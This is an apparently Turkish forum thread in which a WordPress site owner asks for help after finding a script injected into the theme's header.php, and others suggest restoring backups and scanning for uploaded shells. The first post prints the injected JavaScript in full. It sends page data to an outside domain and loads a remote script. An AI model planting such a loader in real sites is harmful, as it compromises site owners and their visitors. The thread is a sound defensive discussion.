• 09-11-2015, 16:32:08
    #1
    Arkadaşlar bugün sitemin aşırı yavaşladığını fark ettim sayfalarda gezinirken alt kısımda ilginç bir site adresine bağlanmaya çalıştığını fark ettim muhtemelen siteme birşeyler yapıldı. Bunu nasıl düzeltebilirim veya nereden bulabilirim.

    Sistem wordpress dir arkadaşlar.



    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 16:32:08 -->-> Daha önceki mesaj 16:07:19 --

    kendi kendime arayarak buldum arkadaşlar kodları biri temamın header.php kısmına şu şekilde yapıştırmış.

    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://mokinukai.lt/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
    Şimdi bunu tekrar yapamaması için ne yapabilirim nasıl bir önlem almalıyım onu sorayım
  • 09-11-2015, 17:17:12
    #2
    sitenize büyük ihtimalle slider vb. bi yerden uploader yüklendi, varsa eski yedek yükleyin. yoksa sitenizin dosyalarını cpanel üzerinden ya da indirerek antivirüs ile tarayın.
  • 09-11-2015, 17:59:27
    #3
    gencbeyin adlı üyeden alıntı: mesajı görüntüle
    sitenize büyük ihtimalle slider vb. bi yerden uploader yüklendi, varsa eski yedek yükleyin. yoksa sitenizin dosyalarını cpanel üzerinden ya da indirerek antivirüs ile tarayın.
    Direk indirip tarattım 10 adet virüs çıktı bağlı olduğu klasör de dahil hepsini sildim. Ama içimden bir his yetersiz gibi geldi sanki başka bir şekilde bunu yapmışlar gibi geliyor ama yinede çok teşekkür ederim cevabınız ve yardımınız için.
  • 09-11-2015, 18:09:53
    #4
    hostinginizde açık varsa farklı bir siteden shell aracılığıyla da yapmış olabilirler ama wordpress ise eklentilerdeki açıklar ile bunu yapıyorlar genelde.